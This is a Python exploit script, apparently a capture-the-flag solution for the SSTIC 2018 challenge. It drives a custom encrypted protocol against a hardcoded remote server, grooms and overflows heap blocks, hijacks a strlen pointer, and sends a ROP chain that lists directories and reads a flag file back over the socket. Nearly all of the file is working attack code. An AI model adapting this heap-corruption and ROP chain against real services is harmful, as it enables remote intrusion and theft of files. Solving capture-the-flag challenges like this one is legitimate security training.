
from socket import *

from Crypto.PublicKey import RSA

import struct
import aes

class Command(object):
    def __init__(self, src=None, dst=None, id=None, data=None):
        self.src  = src
        self.dst  = dst
        self.id   = id
        self.data = data

    def parse(self, command):
        magic = command[:16]
        command = command[16:]

        #assert(magic == "AAAA\xde\xc0\xd3\xd1babar007")
        #assert(magic == "AAAA\xde\xc0\xd3\xd1ceqejeve")

        self.src = struct.unpack('<Q', command[:8])[0]
        command = command[8:]

        self.dst = struct.unpack('<Q', command[:8])[0]
        command = command[8:]

        self.id = struct.unpack('<L', command[:4])[0]
        command = command[4:]

        self.size = struct.unpack('<L', command[:4])[0]
        command = command[4:]

        self.data = command

    def build(self):
        buf = ""
        buf += "AAAA\xde\xc0\xd3\xd1babar007"
        buf += struct.pack('<Q', self.src)
        buf += struct.pack('<Q', self.dst)
        buf += struct.pack('<L', self.id)
        buf += struct.pack('<L', len(self.data)+0x28)
        buf += self.data
        return buf

    def __str__(self):
        s = ''
        s += 'Src  : ' + hex(self.src)  + '\n'
        s += 'Dst  : ' + hex(self.dst)  + '\n'
        s += 'Cmd  : ' + hex(self.id)   + '\n'
        s += 'Size : ' + hex(self.size) + '\n'
        s += 'Data : ' + self.data.encode('hex') + '\n'
        return s

class Message(object):
    def __init__(self, key_server, key_client):
        self.key_server = key_server
        self.key_client = key_client

    def decrypt(self, data):
        iv   = data[:0x10]
        data = data[0x10:]
        data = self._decrypt_aes(data, iv)

        cmd = Command()
        cmd.parse(data)

        return cmd

    def encrypt(self, data):
        iv = '\x00' * 16
        if len(data) % 16 != 0:
            data += '\x00' * (16-(len(data) % 16))
        data = self._encrypt_aes(data, iv)

        return iv + data

    def _decrypt_aes(self, data, iv):
        m = aes.AESModeOfOperationCBC(self.key_client, iv)
        res = ''
        while data:
            res += m.decrypt(data[:16])
            data = data[16:]
        return res

    def _encrypt_aes(self, data, iv):
        m = aes.AESModeOfOperationCBC(self.key_server, iv)
        res = ''
        while data:
            res += m.encrypt(data[:16])
            data =  data[16:]
        return res

class Connexion(object):
    def __init__(self, addr, port, id):
        rsa_client = RSA.generate(2048)

        self.conn = socket(AF_INET, SOCK_STREAM)
        self.conn.connect((addr, port))

        #Receive server public key
        n_server = self.conn.recv(5000)
        n_server = self._string_to_nb(n_server)

        #Send client public key
        self.conn.send(self._nb_to_string(rsa_client.n))

        #Receive server AES key
        encrypted_aes_server = self.conn.recv(5000)
        aes_server = self._decrypt_rsassa(rsa_client, encrypted_aes_server)

        #Send client AES key
        aes_client = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.decode('hex')
        self.conn.send(self._encrypt_rsassa(n_server, aes_client))

        self.server_id = 0
        self.client_id = id
        self.message = Message(aes_server, aes_client)

        self.send_recv(0x10000, "")


    def _string_to_nb(self, s):
        nb = 0
        while s:
            nb <<= 8
            nb += ord(s[0])
            s = s[1:]
        return nb

    def _nb_to_string(self, nb):
        s = ""
        while nb:
            s += chr(nb % 256)
            nb >>= 8
        return s[::-1]

    def _decrypt_rsassa(self, key, data):
        data = key.decrypt(data)
        data = '\x00' * (256-len(data)) + data
        assert(data[0] == '\x00')
        assert(data[1] == '\x02')
        data = data[2::]

        return data[data.find('\x00')+1:]

    def _encrypt_rsassa(self, n, data):
        assert(len(data) < 256)
        buffer = '\x00\x02'
        buffer += '\xcc' * (256-3-len(data))
        buffer += '\x00'
        buffer += data

        nb = self._string_to_nb(buffer)
        m = pow(nb, 0x10001, n)

        return self._nb_to_string(m)

    def send_id(self, id):
        self.client_id = id
        self.send(0x10000, "")

    def send_recv(self, cmd_id, data):
        self.send(cmd_id, data)
        self.recv()

    def send(self, cmd_id, data):
        cmd = Command(self.client_id, self.server_id, cmd_id, data)
        cmd = cmd.build()

        msg = self.message.encrypt(cmd)

        self.conn.send(struct.pack('<L', len(msg)))
        self.conn.send(msg)

    def recv(self):
        size = self.conn.recv(4)
        size = struct.unpack('<L', size)[0]

        msg = ""
        while len(msg) != size:
            msg += self.conn.recv(5000)

        cmd = self.message.decrypt(msg)

        print "Received : "
        print str(cmd)

    def recv_raw(self):
        msg = ""
        while len(msg) != 0x1000:
            msg += self.conn.recv(5000)

        print "Received : "
        return msg

    def close(self):
        self.conn.close()


class ROP(object):
    pop_rdi = struct.pack('<Q', 0x400766)
    pop_rsi = struct.pack('<Q', 0x4017dc)
    pop_rdx = struct.pack('<Q', 0x454ee5)
    pop_rax = struct.pack('<Q', 0x454e8c)
    pop_rcx = struct.pack('<Q', 0x408f59)
    syscall = struct.pack('<Q', 0x47fa05)

    mov_rsi_rax = struct.pack('<Q', 0x489291)

    def write_what_where(self, addr, data):
        if len(data) % 8 != 0:
            data = data + ('\x00' * (8 - len(data)))
        res = ""
        res += self.pop_rsi
        res += struct.pack('<Q', addr)
        res += self.pop_rax
        res += data
        res += self.mov_rsi_rax
        return res

    def open(self, name):
        res = ""
        cpt = 0
        while name:
            res += self.write_what_where(0x6D4000+cpt, name[:8])
            cpt += 8
            name = name[8:]

        res += self.pop_rax
        res += struct.pack('<Q', 2)    # sys_open
        res += self.pop_rdi
        res += struct.pack('<Q', 0x6D4000)
        res += self.pop_rsi
        res += struct.pack('<Q', 0x0)      # flags
        res += self.pop_rcx
        res += struct.pack('<Q', 0x0)      # mode
        res += self.syscall
        return res

    def mov_rdi_rax(self, addr):
        res = ""
        res += self.pop_rdx
        res += struct.pack('<Q', addr)
        res += self.pop_rdi
        res += struct.pack('<Q', 0x0)
        res += struct.pack('<Q', 0x456011) # or rdi, rax ; mov qword ptr [rdx], rdi ; pop rbx ; pop rbp ; ret
        res += 'AAAAAAAA'
        res += 'AAAAAAAA'
        return res

    def getdents(self, addr, size):
        res = ""
        res += self.pop_rsi
        res += struct.pack('<Q', addr)
        res += self.pop_rcx
        res += struct.pack('<Q', size)
        res += self.pop_rax
        res += struct.pack('<Q', 217)
        res += self.syscall
        return res

    def mov_rax_mem(self, addr):
        res = ""
        res += self.pop_rax
        res += struct.pack('<Q', addr)
        res += struct.pack('<Q', 0x4A5C62) # mov rax, qword ptr [rax] ; ret
        return res

    def sub_rax_imm(self, imm):
        res = ""
        res += self.pop_rdx
        res += struct.pack('<Q', imm)
        res += struct.pack('<Q', 0x407CBB) # sub rax, rdx
        return res

    def send(self, addr, size):
        res = ""
        res += self.pop_rsi
        res += struct.pack('<Q', addr)
        res += self.pop_rdx
        res += struct.pack('<Q', size)
        res += struct.pack('<Q', 0x4571BD) # send
        return res

    def read(self, addr, size):
        res = ""
        res += self.pop_rsi
        res += struct.pack('<Q', addr)
        res += self.pop_rdx
        res += struct.pack('<Q', size)
        res += self.pop_rax
        res += struct.pack('<Q', 0)
        res += self.syscall
        return res

def parse_ls(msg):
    while msg:
        d_ino = struct.unpack('<Q', msg[:8])[0]
        msg = msg[8::]

        if not d_ino:
            break

        d_off = struct.unpack('<Q', msg[:8])[0]
        msg = msg[8::]

        d_reclen = struct.unpack('<H', msg[:2])[0]
        msg = msg[2::]

        d_type = struct.unpack('<B', msg[:1])[0]
        msg = msg[1::]

        d_name = msg[:d_reclen-8-8-2-1].rstrip('\x00')
        msg = msg[d_reclen-8-8-2-1:]

        res = ""
        if d_type & 8:
            res += "FILE "
        if d_type & 4:
            res += "DIR "
        res += d_name

        print res

# Everything can be test in a local server since the binary is statically linked
# ip_server = '127.0.0.1'
# port_server = 31337

ip_server = '195.154.105.12'
port_server = 36735

raw_input("Connections...")

conn1 = Connexion(ip_server, port_server, 0x1111111111111111)
conn2 = Connexion(ip_server, port_server, 0x2222222222222222)
conn3 = Connexion(ip_server, port_server, 0x3333333333333333)

raw_input("Realloc block 1...")

for i in xrange(11):
    conn1.send_id(0x1000 + i)

raw_input("Realloc block 2...")

for i in xrange(11):
    conn2.send_id(0x2000 + i)

raw_input("Realloc block 3...")

for i in xrange(11):
    conn3.send_id(0x3000 + i)

raw_input("Overflow block 2...")

conn2.send_id(0x30 + 0x8 + 0x8 + 1)

raw_input("Free block 3...")

conn3.close()

raw_input("Overflow block 1...")

conn1.send_id(0xC1)

raw_input("Erase linked list element to our address...")

conn2.send_id(0x6D70D8) # strlen

raw_input("Get the first 0x30 destination array...")

conn4 = Connexion(ip_server, port_server, 0x4444444444444444)

raw_input("Get the second 0x30 which is our own address...")

conn5 = Connexion(ip_server, port_server, 0x5555555555555555)

raw_input("Set the new address of strlen...")

conn5.send_id(0x480120) # add     rsp, 78h

raw_input("Setting the shellcode...")

r = ROP()

def ls(path):
    payload = ""
    payload += r.open(path)
    payload += r.mov_rdi_rax(0x6D5000)
    payload += r.getdents(0x6D4000, 0x1000)
    payload += r.mov_rax_mem(0x6D5000)
    payload += r.sub_rax_imm(1)
    payload += r.mov_rdi_rax(0x6D5010)
    payload += r.send(0x6D4000, 0x1000)
    return payload

def readfile(filename):
    payload = ""
    payload += r.open(filename)
    payload += r.mov_rdi_rax(0x6D5000)
    payload += r.read(0x6D4000, 0x1000)
    payload += r.mov_rax_mem(0x6D5000)
    payload += r.sub_rax_imm(1)
    payload += r.mov_rdi_rax(0x6D5010)
    payload += r.send(0x6D4000, 0x1000)
    return payload

padding = "A" * 8

payload = ls(".")
#payload = ls("secret")
#payload = readfile("secret/sstic2018.flag")

shellcode = padding + payload
assert(len(shellcode) < 0x3F00)

raw_input("Triggering the exploit...")

conn5.send(0x1040100, shellcode)
msg = conn5.recv_raw()

parse_ls(msg)
#print msg.encode('hex')

raw_input("End...")

